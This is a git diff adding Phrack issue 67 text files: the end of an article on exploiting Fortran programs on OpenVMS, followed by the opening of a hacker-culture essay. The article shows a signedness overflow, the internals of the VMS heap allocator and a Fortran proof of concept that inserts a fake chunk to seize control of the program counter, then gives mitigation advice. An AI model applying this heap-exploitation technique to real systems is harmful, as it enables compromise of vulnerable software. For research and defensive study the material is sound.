+	IF (length .gt. 80) THEN                                [L1]
+		write(*,*) 'S is too long man ...', length
+		STOP
+	END IF
+
+	DO I=1,len(Guard0)
+			Guard0(I:I) = 'Y'
+			Guard1(I:I) = 'Z'
+	END DO
+
+	write(*,*) '3. Copying ... '
+	CALL copy(S,MIN(len_trim(S),length))
+	
+	END PROGRAM
+ 	-----END SIGNED 1-----
+
+    *) A security check is performed in [L1]. However due to the signedness
+       issue, a user may be able to bypass it by suppling a negative value.
+
+    *) The copy function is called with the negative size [L2].
+
+As expected, LIB$MOVC3() implicitly castes the integer as unsigned and if a
+negative length is supplied, a crash occurs.
+
+ 	-----BEGIN SIGNED 2-----
+$ r /debug MOVC3
+[...]
+DBG> go
+&Guard0=     40068
+&Guard1=     40058
+1. Buffer string?
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+2. String len?
+16                                   <-- let's first copy 16 bytes
+3. Copying ... 
+Len=        10
+&Len=  7AE3DA58                      <-- stack address
+&D=     40000                        <-- global data address 
+&S=     40078                        <-- global data address
+D is AAAAAAAAAAAAAAAA                <-- copy was successful
+
+%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
+DBG> dump /hex %hex 40000:%hex 40100
+ 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040000
+ 00000000 00000000 00000000 00000000 ................ 0000000000040010
+ 00000000 00000000 00000000 00000000 ................ 0000000000040020
+ 00000000 00000000 00000000 00000000 ................ 0000000000040030
+ 00000000 00000000 00000000 00000000 ................ 0000000000040040
+ 5A5A5A5A 5A5A5A5A 00000000 00000010 ........ZZZZZZZZ 0000000000040050
+ 59595959 59595959 5A5A5A5A 5A5A5A5A ZZZZZZZZYYYYYYYY 0000000000040060
+ 41414141 41414141 59595959 59595959 YYYYYYYYAAAAAAAA 0000000000040070
+ 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040080
+ 20202020 20202020 41414141 41414141 AAAAAAAA         0000000000040090
+ 20202020 20202020 20202020 20202020                  00000000000400A0
+ 20202020 20202020 20202020 20202020                  00000000000400B0
+ 00000000 00000000 20202020 20202020         ........ 00000000000400C0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400D0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400E0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400F0
+                            00000000 ....             0000000000040100
+[...]
+DBG> go
+&Guard0=     40068
+&Guard1=     40058
+1. Buffer string?
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+2. String len?
+-1
+3. Copying ... 
+Len=      FFFF         <--- We are requesting a 65535 bytes copy
+&Len=  7AE3DA58
+&D=     40000
+&S=     40078
+%SYSTEM-F-ACCVIO, access violation, reason mask=00, 
+virtual address=0000000000042000, PC=FFFFFFFF80C85234, PS=0000001B
+[...]
+DBG> dump /hex %hex 40000:%hex 40100
+ 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040000
+ 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040010
+ 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040020
+ 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040030
+ 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040040
+ 00000000 00000000 00000000 00000000 ................ 0000000000040050
+ 00000000 00000000 00000000 00000000 ................ 0000000000040060
+ 00000000 00000000 00000000 00000000 ................ 0000000000040070
+ 00000000 00000000 00000000 00000000 ................ 0000000000040080
+ 00000000 00000000 00000000 00000000 ................ 0000000000040090
+ 00000000 00000000 00000000 00000000 ................ 00000000000400A0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400B0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400C0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400D0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400E0
+ 00000000 00000000 00000000 00000000 ................ 00000000000400F0
+                            00000000 ....             0000000000040100
+ 	-----END SIGNED 2-----
+
+Comparing the difference between both executions, it's easy to see that the 
+overflow was effective as Guard0, Guard1, S and even length were 
+overwritten. The crash occurs during the copy because of the guard page 
+located at 0x42000 (the page is not mmaped). This case is probably not 
+exploitable but is sufficient to prove the reality of signedness bugs on
+a VMS environnement.
+
+Is such a situation likely to happen? Fortunately, yes. Indeed, HP is nice 
+enough to make easy the use of the VMS API in every supported language. For
+example you will see countless examples in the official documentation 
+explaining how to call VMS functions when programming in Fortran, VAX asm, 
+C, etc. A bit of googling confirmes it.
+
+
+---[ 4.2 - Playing with the heap
+
+Like I said before, OpenVMS developers usually tend (even in Fortran) to
+use the VMS native RTL API which is far more granular than the classical C
+malloc/free functions [R13]. However, ALLOCATE() and DEALLOCATE() could be
+chosen for portability purpose which is why we focus on them in this study.
+
+What will be shown below are the global algorithms behind malloc/free and
+ALLOCATE/DEALLOCATE as they are almost the same (if not exactly the same).
+More generally, it is believed that this result could easily be transposed
+to the VMS kernel heap [R14] though the adaptation itself is left as an
+exercise for the reader.
+
+Understanding the VMS malloc/free API
+-------------------------------------
+
+Unallocated memory is grouped into "bins" of (almost) similar sizes,
+implemented by using a single-linked list of chunks (with a pointer stored
+in the unallocated space inside the chunk) as illustrated below:
+
+     +-------+     +-------+     +-------+
+     | Bin X |---->| Chunk |---->|  0x0  |
+     +-------+     +-------+     +-------+
+     |  ...  |
+     +-------+     +-------+     +-------+     +-------+     +-------+
+     | Bin Y |---->| Chunk |---->| Chunk |---->| Chunk |---->|  0x0  |
+     +-------+     +-------+     +-------+     +-------+     +-------+
+     |  ...  |
+     +-------+     +-------+
+     | Bin Z |---->|  0x0  |
+     +-------+     +-------+
+
+In this particular case, at least 4 free() have already been performed. Now
+let's have a look at the chunk 'returned' by malloc(): 
+
+
+                             4 bytes
+             <------------------------------------->
+                                 
+                                 <-------->
+                                   1 byte
+
+    chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+             |                 SIZE                |
+             +-------------------------------------+
+             |   tag = 0xF00D   |  Bin_ID |  0x00  |
+      mem -> +-------------------------------------+
+             |                                     |
+             .                                     .
+             .                  DATA               .
+             .                                     .
+             |                                     |
+             + + + + + + + + + + + + + + + + + + + +
+             
+With :
+
+   *) SIZE: the size of the chunk in bytes. It may be rounded.
+   *) 0xF00D: a tag which indicates that the chunk is allocated.
+   *) Bin_ID: The ID of the Bin corresponding to the allocated SIZE.
+   *) mem: the pointer returned by malloc() or ALLOCATE().
+
+If the user performs a free() or a DEALLOCATE() on this chunk, a slight 
+modification occurs:
+
+                             4 bytes
+             <------------------------------------->
+                                 
+                                 <-------->
+                                   1 byte
+
+    chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+             |                 SIZE                |
+             +-------------------------------------+
+             |   tag = 0x7777   |  Bin_ID |  0x00  |
+      mem -> +-------------------------------------+
+             |               NEXT_MEM              |
+             +-------------------------------------+
+             |                                     |
+             .                                     .
+             .         free (uncleaned) space      .
+             .                                     .
+             |                                     |
+             + + + + + + + + + + + + + + + + + + + +
+
+With:
+
+   *) SIZE and Bin_ID being unchanged.
+   *) 0x7777: a tag indicating that the chunk is not allocated anymore.
+   *) NEXT_MEM: a pointer to the next chunk's mem of the same bin. It can
+      be the NULL pointer if there is no more free chunks in the list.
+
+Note: It may sound silly not to point to the next 'chunk' directly but 
+that's how things are done friends.
+
+The free() algorithm is somewhat basic and can essentially be described 
+using the following pseudo code:
+
+ 	-----BEGIN free()-----
+	free(void *p):
+                CHUNK *c, *head; 
+                c = chunk_from_mem(p);
+                c->tag = 0x7777;
+		head = get_head_from_chunk(c);              [L1]
+		c->NEXT_MEM = head->first;                  [L2]
+		head->first = c;                            [L3]
+	-----END free()-----
+
+So in the end, a free() is 'almost' equivalent to an element insertion in a
+single list. In practice, the real allocator may well be a bit more complex
+as I didn't investigate the chunks splitting/fusion mechanisms (if any).
+Note that a free()ed chunk will become the first of the corresponding 
+single chained list, something to keep in mind.
+
+The malloc() function is pretty straightforward:  
+
+ 	-----BEGIN malloc()-----
+	void *malloc(size_t s):
+		CHUNK *c, *head;
+		size_t s_new = ROUND(s);
+		head = get_head_from_size(s_new);            [M1]
+
+		if(!head->first)
+		{
+			[...]
+		}
+
+		c = head->first;			     [M2]
+		c->tag = 0xF00D;                             [M3]
+		head->first = c->NEXT_MEM;                   [M4]
+		return (mem_from_chunk(c));
+	-----END malloc()-----
+
+A malloc() is the removal of a chunk from the corresponding chained list.
+Note that the first chunk of the list will be the first to be removed. If
+the list is empty, a special treatment is performed but we don't care about
+that.
+
+Taking advantage of the overflow
+--------------------------------
+
+Exploiting an heap overflow can be done using at least two techniques:
+
+   *) The (partial) overwrite of metadata stored on the heap. Depending on
+      where and how much you can overflow, this might be interesting 
+      especially since function pointers could be stored there.
+
+   *) The fake chunk insertion. The idea is to make malloc returning an 
+      address pointing to a chosen area (like the stack). The normal use
+      of the buffer will then lead to the control of the process.
+
+Since the first technique is no news, let's see how to perform the second
+one. In order to do that, we'll play with following C code:
+
+ 	-----BEGIN HEAP VMS 1-----
+	// Allocation
+	int *p = malloc(100);
+	int *q = malloc(100);
+	memset(p, 0x41, 100);
+	memset(q, 0x42, 100);
+	free(q);                              [N1]
+	// heap overflow
+	memcpy(p, user_buff, user_size);      [N2]
+ 	-----END HEAP VMS 1-----
+
+In order to simplify things, we'll assume that there was no previous
+allocation in the same BIN. Let's visualize the heap layout:
+
+	Before [N1]		Before [N2]		After [N2]
+
+	[ 00000070 ]        	[ 00000070 ]		[ 00000070 ]
+	[ f00d3d00 ]		[ f00d3d00 ]		[ f00d3d00 ]
+  p ->  [ 41414141 ]		[ 41414141 ]		[ 41414141 ]
+        [ 41414141 ]		[ 41414141 ]		[ 41414141 ]
+        [ 41414141 ]		[ 41414141 ]		[ 41414141 ]
+        [ 41414141 ]		[ 41414141 ]		[ 41414141 ]
+	[   ...    ]		[   ...    ]		[   ...    ]
+	[ 00000070 ]		[ 00000070 ]		[ 55555555 ]
+	[ f00d3d00 ]		[ 77773d00 ]  	user ->	[ 55555555 ]
+  q ->  [ 42424242 ]		[ 00000000 ]  supplied  [ 00000000 ]
+        [ 42424242 ]		[ 42424242 ]  pointer	[ 42424242 ]
+
+Now regarding the associated linked list, we have the following evolution:
+
+      +------------+     +------------+
+  1.  |  Bin 0x3d  |---->| 0x00000000 |
+      +------------+     +------------+
+
+      +------------+     +------------+     +------------+
+  2.  |  Bin 0x3d  |---->|      q     |---->| 0x00000000 |
+      +------------+     +------------+     +------------+
+
+      +------------+     +------------+     +------------+
+  3.  |  Bin 0x3d  |---->|      q     |---->| 0x55555555 |
+      +------------+     +------------+     +------------+
+
+As a result, the linked list of our bin is corrupted and q->NEXT_MEM is 
+user supplied. To prove that fact, we can dereference q->NEXT_MEM as it 
+will lead to a program crash. This is possible thanks to [M4] if two 
+malloc(100) are performed after the corruption:
+
+ 	-----BEGIN HEAP VMS 2-----
+VMS $ r POC
+[...]
+0000447d0:	 41414141 41414141 41414141 41414141
+0000447e0:	 41414141 41414141 41414141 41414141
+0000447f0:	 41414141 41414141 41414141 41414141
+000044800:	 41414141 55555555 55555555 f00d5555        [O1]
+000044810:	 55555555 42424242 42424242 42424242
+000044820:	 42424242 42424242 42424242 42424242
+000044830:	 42424242 42424242 42424242 42424242
+000044840:	 42424242 42424242 42424242 42424242
+[...]
+%SYSTEM-F-ACCVIO, access violation, [...] virtual address=0000000055555555
+%TRACE-F-TRACEBACK, symbolic stack dump follows
+  image    module    routine        line      rel PC           abs PC      
+ LIBRTL                                0 000000000000610C FFFFFFFF80C2E10C
+ LIBRTL                                                 ?                ?
+ DECC$SHR_EV56                         0 0000000000052710 FFFFFFFF80DDE710
+ DECC$SHR_EV56                                          ?                ?
+ POC  POC  main                     4210 00000000000003BC 00000000000203BC
+ POC  POC  __main                   4128 000000000000006C 000000000002006C
+	-----END HEAP VMS 2-----
+
+It's interesting to see that _fortunately_ size doesn't matter ;). Indeed
+free() is not 'really' looking at what's written in the corrupted chunk's 
+header [O1] (size, allocation tag, ...). Great for us it makes things even
+easier.
+
+However something really important is that the corruption would seemingly 
+not have been possible if q was allocated as:
+
+   *) if q was allocated then it wouldn't be part of the list.
+   *) and if q was free()ed _after_ the corruption then q->NEXT_MEM would 
+      naturally be overwritten by free(). 
+
+There might be a way to trick the allocator so that an arbitrary free() is
+performed but I couldn't find any way to do that probably because my 
+knowledge of the allocator algorithm is rather limited.
+
+At that point, we've almost won as we successfully inserted a fake chunk
+in the linked list. As a result, writing will be performed at a user 
+supplied address. However depending on the context, we may or may not be 
+able to sufficiently control _what_ will be written:
+
+   *) If we cannot control the payload then a F00D delivery is still 
+      possible thanks to [M3]. If we can make the program perform the two 
+      necessary allocations, then the program will write 0xF00D at 'addr' 
+      if NEXT_MEM is overwritten with 'addr+2'. If you plan to exploit the
+      least significant bits of a pointer then you can probably improve the
+      technique with an F0 overwrite if the data located immediately before 
+      can be partially corrupted.
+
+      Note: Starving hackers would probably have thought of turning F00D 
+      into 0D but remember that Alpha is big endian.
+
+   *) If we can control the payload, then the best way is probably to 
+      overwrite the PC address saved on the stack (there is no ASLR folks).
+      Back on our feets [R9]:
+
+ 	-----BEGIN HEAP VMS 3-----
+VMS $ type poc.F90
+        PROGRAM POC
+        INTEGER(4), POINTER :: P(:)
+        INTEGER(4), POINTER :: Q(:)
+        INTEGER(4), POINTER :: M(:)
+        INTEGER(4), POINTER :: P2(:)
+        INTEGER(4)          :: I
+
+        ALLOCATE(P(100))
+        ALLOCATE(Q(100))
+
+        ! Debugging purpose
+        P = 'AAAA'
+        Q = 'BBBB'
+        write(*,fmt='(A,Z10)') ' P=',%LOC(P)
+        write(*,fmt='(A,Z10)') ' Q=',%LOC(Q)
+
+        P2 => P
+        DEALLOCATE(Q)
+
+        ! Fake heap overflow
+        P2(101) = Z'55555555'
+        P2(102) = Z'55555555'
+        P2(103) = Z'55555555'
+        P2(104) = Z'55555555'
+        P2(105) = Z'7AE3D910' + 100 ! fixed to work ;)
+
+        write(*,*) "******** AFTER CORRUPTION ************"
+        ALLOCATE(M(100))
+        write(*,*) "******** AFTER MALLOC 1 ************"
+        
+        ALLOCATE(M(100))
+        write(*,fmt='(A,Z10)') ' FAKE CHUNK AT ',%LOC(M)
+        ! Simulating a user supplied payload
+        DO I=1,80
+                M(I) = Z'44444444'
+        END DO
+        END PROGRAM
+VMS $ FORT poc
+VMS $ LIN poc
+VMS $ r poc
+P=     52008
+Q=     521A8
+******** AFTER CORRUPTION ************
+******** AFTER MALLOC 1 ************
+FAKE CHUNK AT   7AE3D974
+%SYSTEM-F-ACCVIO, [...] PC=4444444444444444, PS=0000001B
+%TRACE-F-TRACEBACK, symbolic stack dump follows
+  image    module    routine         line      rel PC           abs PC      
+                                        0 4444444444444444 4444444444444444
+ 	-----END HEAP VMS 3-----
+
+Note: The stack address is hardcoded but this is not a big issue as there
+is no ASLR :).
+
+One step further
+----------------
+
+OK a few more things and we're done with OpenVMS (anyway at that point 
+you're probably either sleeping already or reading a much more interesting
+article of this issue ;)).
+
+1) I came across this funny thing while reading HP's documentation [R11]:
+
+                                    ---
+              Chap 5.9.5 2-GB malloc No Longer Fails Silently
+
+The C RTL malloc function accepts an unsigned int (size_t) as its 
+parameter. The LIB$VM_MALLOC action accepts a (positive) signed integer as 
+its parameter. Allocating 2 GB (0x80000000) did not allocate the proper 
+amount of memory and did not return an error indication. A check is now 
+added to the malloc, calloc, and realloc functions for sizes equal to or 
+greater than 2 GB that fail the call.
+                                    ---
+
+WOWOWOWO jackpot :) Who said this _could_ have security consequences? ;> 
+
+2) I investigated the ALLOCATE(size) issue under OpenVMS Alpha 8.3 and the
+result is that if size <= 0 and size >= -0x80000000 then the address 0x100 
+is returned (if size < -0x80000000 an input conversion occurs 
+(%FOR-F-INPCONERR)).
+
+Since the 0x100 address is not mmaped, the only way to exploit this 
+situation would be to dereference the pointer using a sufficiently great 
+index to access user controlled data. While this is theoretically feasible 
+since memory regions are mmaped at low addresses, a practical case has yet 
+to be found.
+
+                                    ---
+
+---[ 7 - Prevention: lets use a condom
+
+Now is the time to think about how to avoid security troubles with Fortran
+programs. In order to do that, several things (more or less effective) can 
+be done:
+
+    *) A careful review of the source code. Believe me, it's not that easy.
+       To properly perform that, you have to know the language deeply and 
+       being well aware of its weaknesses. Depending on your level of 
+       mastery, bugs may still be left as Fortran really is a vicious 
+       language. Mastering this paper for example is probably far from 
+       being enough.
+
+    *) The study of your Fortran compiler. Try to find what kind of bugs 
+       are likely to be found/exploited with your compiler. A good starting
+       point is probably to have a look at the "Compiler Diagnostic Test 
+       Sets" project [R17]. Not only will you find accurate information
+       about several compilers but you will also find new kind of bugs
+       (though not always security related) as well as a precious test set.
+
+    *) Read the manpage of your compiler to see if compile/runtime extra 
+       security checks could be performed. Let me show you an example.
+       Remember that in Chap 3.1 I gave the following example:
+
+	-----BEGIN OVERFLOW 1-----
+	$ cat overflow1.f90
+		PROGRAM test
+		CHARACTER(len=30) :: S  ! String of length 30
+		INTEGER(4) I
+		S = 'Hello Phrack readers!'
+		read(*,*) I
+		S(I:I) = '.'
+		write(*,*) S
+		END PROGRAM
+	$ gfortran overflow1.f90
+	$ ./a.out
+	 He.lo Phrack readers!      <-- S was modified with 0x2E
+	$ gdb ./a.out
+        [...]
+	(gdb) r
+	Starting program: a.out
+	50                          <-- 50 is clearly out of scope! (>30)
+	Breakpoint 1, 0x080487be in MAIN__ ()
+	(gdb) print /d $eax
+	$1 = 50
+	(gdb) c
+	Hello Phrack readers!
+	Program received signal SIGSEGV, Segmentation fault.
+	0x2e04885b in ?? ()         <-- EIP was corrupted with 0x2E
+	-----END OVERFLOW 1-----
+
+       Now let's see what happens when the '-fbounds-check' option is used:
+
+	-----BEGIN OVERFLOW 2-----
+	$ gfortran overflow1.f90 -fbounds-check
+	$ ./a.out
+        [Type 50]
+	At line 7 of file overflow1.f90
+	Fortran runtime error: Substring out of bounds: upper bound (50) of
+        's' exceeds string length (30)
+        $ ./a.out
+        [Type -1] 
+	At line 7 of file overflow1.f90
+	Fortran runtime error: Substring out of bounds: lower bound (-1) of
+        's' is less than one
+	-----END OVERFLOW 2-----
+
+       As expected, the program now includes runtime checks. Depending on 
+       the bug class, the compiler may have a specific option to prevent or
+       detect it. RTFM.
+
+    *) Static analysis. Well to be honest I didn't investigate it at all.
+       While digging for this article, I came across a couple of opensource
+       projects as well as commercial implementations (sorry NO ADVERTISING
+       in PHRACK dudes).
+       
+       While I didn't test any of them, I can imagine that there may 
+       effective ones as some kind of bugs would really be easy to spot 
+       using for example type checking (first thing that comes to my mind).
+       Anyway it's just mere speculation. Either test it or forget it. Like
+       we care anyway.
+
+Sometimes a condom is not enough. The best for you is probably not to use 
+this insanely fucked language. Once again, who cares about Fortran anyway?
+
+          [ http://www.fortranstatement.com/cgi-bin/petition.pl ]
+
+                                    ---
+
+---[ 8 - The final words
+
+There would have been a lot more to add (studying other compilers/arch) but 
+unfortunately time is running out and I would rather not make the paper 
+more boring than it currently is ;) Anyway as far as I can tell, the 
+essential is covered and with that in mind and a bit of practice, I expect
+you to be able to quickly find new bugs.
+
+Hackers dealing with/busting/exploiting bugs in Fortran programs are 
+so rare in our World that I bet that none of you had ever heard a word 
+about Fortran's security issues. Nowadays people are more focused on 
+languages such as PHP, Java or .NET which is normal for obvious reasons. 
+Now it doesn't mean that other languages are not interesting too and you 
+never know when appropriate knowledge becomes handy. History proved that 
+bugs not always occurred in the 'daily' hacking playground (C/PHP, 
+Unix/Windows) [R19] so why would we restrain ourselves?
+
+Not convinced? OK allow me to alter the smart thoughts of a fellow p67 
+writer: "We hack Fortran just because we can. We don't really need a reason
+anyway as soon as bugs are there, we are there."
+
+                                    ---
+
+---[ 8 - Greetz
+
+My first thoughts are for all talented hackers with whom I had so much to
+share all these years. May you guys never lose that spirit of yours nor
+your ethics [R15]. Special thanks to the Phrack staff for their help, 
+advise and review.
+
+Now and because alone life would have no meaning, special thanks to my
+friends not only for being there but also for being able to support me
+especially when I'm *cranky* as hell :')
+
+Special apologize to the great guys of the FHC (Fortran High Council). Just
+for once I wanted to be as cool as king-fag-c0pe though it probably means 
+that it's a matter of days before witnessing the bust of all cool Fortran 
+0dayZ on FD :((( Don't be afraid sysadmins, thanx to gg security folks 
+everything will be done in a 'responsible' way [R16] ;>
+
+Also thanks to all of you who will nominate this paper at the 2011 pwnies 
+award as the "most innovative research paper" ;>
+
+                                    ---
+
+---[ 9 - Bibliography
+
+[R1]  http://onepiece.wikia.com/wiki/Buggy
+[R2]  Fortran90, ISO/IEC 1539
+[R3]  http://gcc.gnu.org/onlinedocs/gfortran/
+[R4]  HP Fortran for OpenVMS - Language Reference Manual, HP
+[R5]  Shifting the Stack Pointer, andrewg, Phrack #63
+[R6]  Basic Integer Overflows, Blexim, Phrack #60
+[R7]  http://www.cs.rpi.edu/~szymansk/OOF90/bugs.html
+[R8]  http://h71000.www7.hp.com/success-stories.html
+[R9]  Hacking OpenVMS, C. Nyberg, C. Oberg & J. Tusini, Defcon16
+[R10] http://www.cisl.ucar.edu/tcg/consweb/Fortran90/scnpoint.html
+[R11] HP OpenVMS Version 8.3 Release Notes, HP
+[R12] Alpha Assembly Language Guide, R.Bryant, Carnegie Mellon University
+[R13] http://labs.hoffmanlabs.com/node/401
+[R14] OpenVMS Alpha Internals and Data Structures: Memory Management, HP
+[R15] Industry check, ZF0 #5
+[R16] http://googleonlinesecurity.blogspot.com/2010/07/rebooting-
+      responsible-disclosure-focus.html (lol)
+[R17] http://ftp.cac.psu.edu/pub/ger/fortran/test/results.txt
+[R18] http://www.fortranstatement.com
+[R19] http://www5.in.tum.de/persons/huckle//horrorn.pdf
+[R20] http://deathrow.vistech.net
+
+                                    ---
+
+    That is the saving of humor, if you fall no one is laughing at you.
+                              A. Whitney Brown
+
+                                    ---
diff --git a/phrack67/12.txt b/phrack67/12.txt
new file mode 100644
index 0000000..5b9ada9
--- /dev/null
+++ b/phrack67/12.txt
@@ -0,0 +1,719 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x0c of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=------------------=[ P H R A C K E R Z: Two Tales ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ Antipeace and The Analog Kid ]=------------------=|
+|=-----------=[ antipeace@phrack.org / analog_kid@phrack.org ]=----------=|
+|=-----------------------------------------------------------------------=|
+
+This is a tale of two hackers. Two souls lost in this world of bits. One
+tells a first hand tale of a hackers life. Another, gone mad from analyzing
+too many ltrace outputs, looks at the existence of Phrack Inc. from the
+outside.
+
+One wanted to be a hacker from childhood. The other had plans of being a
+rock star. None the less, here in this strange network of fibers, their
+paths collide and their stories are fused together.
+
+Who owns an idea when it is anonymous? Who is the arbiter of ethics, the
+individual hacker or the mass media? What good is a secret that cannot be
+shared? What defines an author if the author is anonymous?
+
+These are two stories from both hackers, fused together, as they struggle
+to answer such questions. It is a collage of segments from the two tales.
+
+                                    ~~~
+
+|=-----------------------------------------------------------------------=|
+|=----------=[ When I was a child I wanted to be one of them ]=----------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[  by Antipeace  ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+  1 - Who the hell is it written for?
+  2 - Who they think we are
+  3 - We are not _so_ special
+  4 - The downside of a hacking life
+  5 - So in the end...
+
+--]
+
+                                    ~~~
+
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ The tale of the phrack boys ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------------=[  by The Analog Kid  ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+  1 - A witch hunt begins
+  2 - What do people think they are?
+  3 - Are they so special?
+  4 - Why they must lurk in the shadows of publicity
+  5 - Of the indictment and the witch hunt
+  6 - A closing note
+  7 - Acknowledgments
+  8 - References
+
+--]
+
+                                    ~~~
+
+                       --(  A witch hunt begins  )--
+                             by The Analog Kid
+
+    "Neither have been charged ... they expect to at least be called as
+    witnesses at the case of the Phrack Boys [1]
+
+April 0x5, 1990, 6:50 AM: On that day a hacker is born into this world.
+
+March 0x1, 1990, 6:30 AM: Secret service agents charge into the room of
+Phrack Inc contributor, The Mentor. Their guns are drawn and pointed at his
+head.
+
+March 0x1, 1990, 11:00 AM: Secret service agents complete their search and
+seizure of The Mentor's property. Agents prepare to raid the Mentor's work
+office [1].
+
+April 0x5, 1990, 12:00 PM: The wheels are spinning busily at Phrack Inc.
+With key members under investigation by the federal government, rumors are
+rampant of the journal's demise. Remaining members of the underground
+bustle to assemble a new issue and quell the rumors. "Phrack will and can't
+ever die, the journal proclaims [2].
+
+                                    ~~~
+
+                 --(  Who the hell is it written for?  )--
+                               by Antipeace
+
+If I had to make a choice, I would say that the hacking papers which
+impressed me the most were the unusual ones and by "unusual" I mean dealing
+with subjects such as esotericism, philosophy, and ethics. Yes the kind of
+things that would bore you to death. It's not that I systematically prefer
+intellectual masturbation over coding but let's face the pathetic truth:
+though there are exceptions, good technical papers are rarer and rarer and
+information is shamelessly duplicated everywhere.
+
+Interestingly enough, papers written on a thinking or life experience basis
+are on a whole other scale. Being based on personal experience, they are
+intrinsically unique. There is no better example than the excellent article
+written by TAp in this issue. Believe me it kicks ass; you'll feel it deep
+down.
+
+Writing these kind of things is usually done with the hope that a message
+will be transmitted. I personally chose to write mine for the people who
+have no clue of what a hacker's true life really is. That may include kids
+willing to learn about our culture as well as those of you who just came
+across these words.
+
+If you ever thought that being a hacker was as cool as what's pictured
+in the movies, then please don't stop reading. This paper, is just a set
+of personal thoughts regarding the (unfinished) life of one (or more ?)
+hackers amongst thousands. Neither the best nor the worst. Just one of
+them.
+
+                                    ~~~
+
+                 --(  What do people think they are?  )--
+                             by The Analog Kid
+
+Phrack Inc., an online journal created by the hacker community, represents
+the contemporary hacker community. Its articles are still well respected
+within academia and it is likely that some of its content draws from the
+academy. Although Phrack Inc. may seem devious to mainstream society on
+the surface, it serves a deeper purpose as a medium to freely distribute
+substantive technical information between an underground community of
+computer programmers. Functionally, Phrack Inc. is an outlet for the free
+discussion of software exploitation.
+
+During my freshman year of college I stumbled upon a Phrack Inc. article
+from time to time, but never realized the site's importance until my
+sophomore year. I was enrolled in a graduate class and the professor used
+the web site as a reference in class one day. When discussing the use of
+the web-site with him after class, the professor was immediately intrigued
+that I was familiar with the site. He told me that, in his opinion, the
+contributors of Phrack Inc. were just as intelligent as those in academia,
+and that sometimes it was good to have publications that were more direct
+and less formal than their academic counterparts. In addition, an in depth
+knowledge of computer software and hardware is required, with references to
+assembly code, operating systems, glibc, gdb, and the dynamic linker strewn
+throughout the articles. The site is also respected by security
+professionals within the IT community, who use it as a tool to track the
+latest hacking methods [3].
+
+Phrack, as a publication, creates an outlet for these hackers to express
+themselves and reveal their values to the public.
+
+                                    ~~~
+
+                      --(  Who they think we are  )--
+                               by Antipeace
+
+The way we humans are generally perceived is really important to most of
+us as there is always an implicit resulting judgment. With the notable
+exception of psychos, most of us are probably willing to be seen as we
+'truly' are, or in other words as we 'believe' ourselves to be, and not as
+we seem to be. As being hackers is part of our identity, it's only natural
+to feel concerned about how this secret part of our personality is seen by
+society.
+
+This brings the question of how hackers are perceived by people in general.
+Though there are notable exceptions, people usually see us as movies/books
+and magazines/TV shows describe us.
+
+Various fictional hackers are pictured in cyberpunk science fiction
+('Matrix'), action movies ('Live Free or Die Hard'), caper films
+('Sneakers') and more generally in many fictional stories. However compared
+to them, we average hackers from the real world are forced to admit that
+we're not that great:
+
+    - we do not hack into satellites on a daily basis
+    - we do not own OpenGL maps of buildings allowing us to control lights,
+      elevators and doors at will
+    - at some point encryption, passwords and firewalls may be troublesome
+      even for us ;)
+
+Of course weak minds may be abused in the process and assume as a result
+that hackers are, at some point, what a typical Bruce Willis movie is
+showing them: wizards. Should we feel angry about it? Certainly not because
+this is fiction and everything is allowed. Now things are different when it
+comes to media.
+
+Who ever criticized the journalists? Not me, nor you, with high
+probability. Almost everybody was or will be the witness of a false claim
+(or of an obvious speculation) from a journalist in his lifetime. The
+problem is that taking into account the almost unlimited number of profiles
+in the audience, that's itself a hint pointing out that mistakes are
+frequent. What is obviously not correct for you may appear correct for me,
+and vice versa.
+
+Now what's interesting is that it gives us an idea about how fucked up a
+media outlet (newspaper, web site, TV show) may be regarding a particular
+area (such as security but not only).
+
+I believe there are two cases to consider:
+    - Technical publications and/or computer literate media
+    - Mass media aimed at the general public
+
+Regarding the first case, my personal belief is that this is two sided.
+Either the provided information is good or it's total bullshit. People
+who care are doing quality and not useless shit. From this point of view,
+popularization is the worst kind of information. Under the pretext of
+simplifying things for people, every kind of approximation appears to be
+allowed. Of course, publication being associated with sales and/or ratings,
+if something can be exaggerated to impress even more, why not? Why would
+journalists try to understand and care about their subject? After all the
+target is a mass audience. So if 2 or 3 people were mad, who would give a
+shit about it?
+
+I've hated journalists for a long time for what I thought to be their
+incompetence. I later learned about the dramatic conditions they're living
+in: precarious employment and the necessity to write ever more for a low
+salary. Journalism changed and now I hate journalists for their lack of
+professionalism. You may argue that one needs to live but I would answer
+back that nothing justifies intellectual prostitution. If a person is
+clever enough to have that kind of job, other jobs should be possible as
+well.
+
+Now coming back to us, how could we be correctly understood / represented
+in these conditions? Sadly, bad journalism is often mass journalism which
+makes things even worse as people (including around you) will always be
+influenced. Trying to change their way to see things is already a lost
